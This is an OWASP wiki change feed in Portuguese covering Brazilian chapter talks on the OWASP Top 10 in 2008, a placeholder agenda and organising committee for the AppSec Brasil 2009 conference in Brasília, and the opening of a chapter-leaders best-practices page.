Introdução sobre o projeto OWASP e TOP10 apresentado aos participantes do ISSA Day/Brasil em Junho/2008, por Leonardo Cavallari.&lt;br /&gt;
&lt;br /&gt;
Download das apresentações pode ser feito nos links abaixo:&lt;br /&gt;
&lt;br /&gt;
Parte I - [http://www.owasp.org/images/b/b4/OWASP-Intro-2008-pt-br.ppt Introdução OWASP]&lt;br /&gt;
&lt;br /&gt;
Parte II - TOP10 2007 [http://www.owasp.org/images/7/75/OWASP_TOP10_PT-BR.ppt Apresentação] - [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Documento]&lt;br /&gt;
&lt;br /&gt;
=== OWASP TOP 10 @ FATEC Sorocaba ===&lt;br /&gt;
No dia 07 de abril às 19:30, Gislaine Lirian Bueno irá apresentar o TOP 10 2007 na FATEC de Sorocaba para os estudantes do curso de Processamento de Dados. A apresentação é aberta ao público, portanto quem estiver pela região ou morar próximo poderá assistir ao evento.&lt;br /&gt;
&lt;br /&gt;
Maiores informações: [http://www.fatecsorocaba.edu.br/contato/contato.asp FATEC Sorocaba]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== OWASP TOP 10 @ FISL ===&lt;br /&gt;
O capítulo Brasil irá fazer uma apresentação no 9º Fórum Internacional de Software Livre - FISL - a ser realizado entre os dias 17 e 19 de abril de 2008. Nesta ocasião o TOP 10 2007, será apresentado pelos membros [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues] e [mailto:leonardocavallari@gmail.com Leonardo Cavallari].&lt;br /&gt;
&lt;br /&gt;
As inscrições para o FISL podem ser realizadas no [http://fisl.softwarelivre.org/ site].&lt;br /&gt;
Grade do evento pode ser acessada em [http://fisl.softwarelivre.org/9.0/papers/pub/ http://fisl.softwarelivre.org/9.0/papers/pub/].&lt;br /&gt;
&lt;br /&gt;
== Atividades ==&lt;br /&gt;
Estamos recrutando voluntários para participarem das seguintes atividades:&lt;br /&gt;
* Tradução de documentos&lt;br /&gt;
* Apresentação de palestras&lt;br /&gt;
Aos interessados em apresentar palestras ou que possam abrir espaço para alguém apresentar, preencha a tabela abaixo procurando manter os registros de acordo com as datas dos eventos:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Facilitador&lt;br /&gt;
! Apresentador&lt;br /&gt;
! Assunto&lt;br /&gt;
! Data&lt;br /&gt;
! Local&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:thiagoalz@gmail.com Thiago Lechuga]&lt;br /&gt;
| [mailto:thiagoalz@gmail.com Thiago Lechuga]&lt;br /&gt;
| OWASP TOP 10&lt;br /&gt;
| Definir&lt;br /&gt;
| UNICAMP&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:janotijr@yahoo.com.br Paulo Janoti]&lt;br /&gt;
| [Definir]&lt;br /&gt;
| OWASP TOP 10&lt;br /&gt;
| Definir (Maio)&lt;br /&gt;
| ISTCC-RJ- FAETEC&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:gugdias@gmail.com Gustavo Dias]&lt;br /&gt;
| Definir&lt;br /&gt;
| OWASP TOP 10/*&lt;br /&gt;
| Definir&lt;br /&gt;
| UFSCAR&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Desenvolvimento de artigos para revistas e mídias de comunicação&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&amp;diff=60049</id>
		<title>AppSec Brasil 2009 (pt-br)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&amp;diff=60049"/>
				<updated>2009-05-04T16:42:39Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Comitês */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Seja bem vindo à Conferência de Segurança de Aplicações do OWASP para o Brasil! Depois de conferências bem sucedidas nos Estados Unidos e na Europa, estaremos no Brasil em outubro de 2009!&lt;br /&gt;
&lt;br /&gt;
[[Image:Brasilia Panorama.jpg]]&lt;br /&gt;
&lt;br /&gt;
Em outubro, o OWASP fará a primeira Conferência de Segurança de Aplicações no Brasil em [http://en.wikipedia.org/wiki/Brasília Brasília], capital do Brasil. A conferência consistirá de dois dias de treinamentos, seguidos de dois dias de conferência em trilha única.&lt;br /&gt;
&lt;br /&gt;
==Local==&lt;br /&gt;
&lt;br /&gt;
'''Brasília, DF, Brasil.'''&lt;br /&gt;
&lt;br /&gt;
==Chamada de Trabalhos==&lt;br /&gt;
&lt;br /&gt;
A definir.&lt;br /&gt;
&lt;br /&gt;
==Chamada de Treinamentos==&lt;br /&gt;
&lt;br /&gt;
A definir.&lt;br /&gt;
&lt;br /&gt;
==Agenda e Apresentações ==&lt;br /&gt;
&lt;br /&gt;
===Programa da Conferência - Dia 1 - 29 de outubro de 2009 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td width=&amp;quot;7%&amp;quot; class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;08:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#8595C2&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;center&amp;gt;&lt;br /&gt;
			  &amp;lt;strong&amp;gt;			  Recepção			  &amp;lt;/strong&amp;gt;&lt;br /&gt;
			&amp;lt;/center&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#eeeeee&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Abertura&amp;lt;/b&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#b9c2dc&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;keynote&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;11:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;11:15&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;tba&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      tba&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;12:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Almoço&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;			&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;13:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;14:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
		    tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;16:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;17:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;tba&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;18:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#CCCCCC&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Encerramento do primeiro dia&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;					&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Programa da Conferência - Dia 2 - 30 de outubro de 2009===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td width=&amp;quot;7%&amp;quot; class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;08:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#8595C2&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;center&amp;gt;&lt;br /&gt;
			  &amp;lt;strong&amp;gt;			  Recepção			  &amp;lt;/strong&amp;gt;&lt;br /&gt;
			&amp;lt;/center&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#eeeeee&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Abertura do segundo dia&amp;lt;/b&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#b9c2dc&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;keynote&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;10:40&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;11:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;tba&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      tba&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;12:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Almoço&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;			&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;13:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;14:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
		    tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;16:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;17:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;tba&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;18:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#CCCCCC&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Encerramento&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;					&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Local do evento==&lt;br /&gt;
&lt;br /&gt;
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]]&lt;br /&gt;
&lt;br /&gt;
O evento será em Brasília, DF, Brasil no endereço: Auditório Nereu Ramos, Câmara dos Deputados - Anexo II, Praça dos Três Poderes.&lt;br /&gt;
&lt;br /&gt;
Veja a localização no [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;q=anexo+II,+camara+dos+deputados,+brasilia&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=43.934478,79.101563&amp;amp;ie=UTF8&amp;amp;t=h&amp;amp;ll=-15.800058,-47.865822&amp;amp;spn=0.01309,0.019312&amp;amp;z=16 Google Maps]&lt;br /&gt;
&lt;br /&gt;
==Treinamentos - 27 e 28 de outubro==&lt;br /&gt;
&lt;br /&gt;
O OWASP oferecerá vários tutoriais de 1 ou 2 dias de duração nos dias anteriores à conferência. Se você estiver interessado em ministrar um tutorial, por favor entre em contato com [mailto:eduardo.neves@owasp.org Eduardo Neves].&lt;br /&gt;
&lt;br /&gt;
==Hospedagem==&lt;br /&gt;
&lt;br /&gt;
A definir.&lt;br /&gt;
&lt;br /&gt;
==Transporte para a Conferência==&lt;br /&gt;
&lt;br /&gt;
A definir&lt;br /&gt;
&lt;br /&gt;
===Como chegar ao local da Conferência===&lt;br /&gt;
&lt;br /&gt;
A definir&lt;br /&gt;
&lt;br /&gt;
==Inscrições e Custos==&lt;br /&gt;
&lt;br /&gt;
A Conferência será gratuita, mas será necessário inscrever-se previamente. O procedimento de inscrição será definido oportunamente.&lt;br /&gt;
&lt;br /&gt;
==Comitês==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
2009 AppSec CPLP - Comitê de Programa:&lt;br /&gt;
* Coordenador Geral: Lucas C. Ferreira (contato at sapao.net)&lt;br /&gt;
* Coordenador de Tutoriais: Eduardo V. C. Neves (eduardo.neves at owasp.org)&lt;br /&gt;
* Coordenador do Programa: Wagner Elias (wagner.elias at owasp.org)&lt;br /&gt;
&lt;br /&gt;
Equipe Organizadora pré-evento&lt;br /&gt;
&lt;br /&gt;
* Cassio Goldschmidt (cassio 'at' owasp.org)&lt;br /&gt;
* Kuai Hinojosa (kuai.hinojosa 'at' owasp.org)&lt;br /&gt;
* Leonardo Cavallari - (email)&lt;br /&gt;
* Thiago Lechuga (thiagoalz 'at' gmail.com)&lt;br /&gt;
&lt;br /&gt;
Equipe Organizadora durante o evento&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Apoios]]==&lt;br /&gt;
&lt;br /&gt;
Esta conferência tem o apoio da Comunidade [http://www.ticontrole.gov.br TI-Controle] e do Centro de Informática da [http://www.camara.gov.br/ Câmara dos Deputados]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Best_Practices_for_OWASP_Chapter_Leaders&amp;diff=44417</id>
		<title>Best Practices for OWASP Chapter Leaders</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Best_Practices_for_OWASP_Chapter_Leaders&amp;diff=44417"/>
				<updated>2008-10-23T01:06:35Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Working Session Participants */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| style=&amp;quot;width:100%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;7&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#b3b3b3; color:white&amp;quot;|&amp;lt;font color=&amp;quot;black&amp;quot;&amp;gt;'''Working Sessions Operational Rules''' - [[:Working Sessions Methodology|'''Please see here the general frame of rules''']].&lt;br /&gt;
 |}&lt;br /&gt;
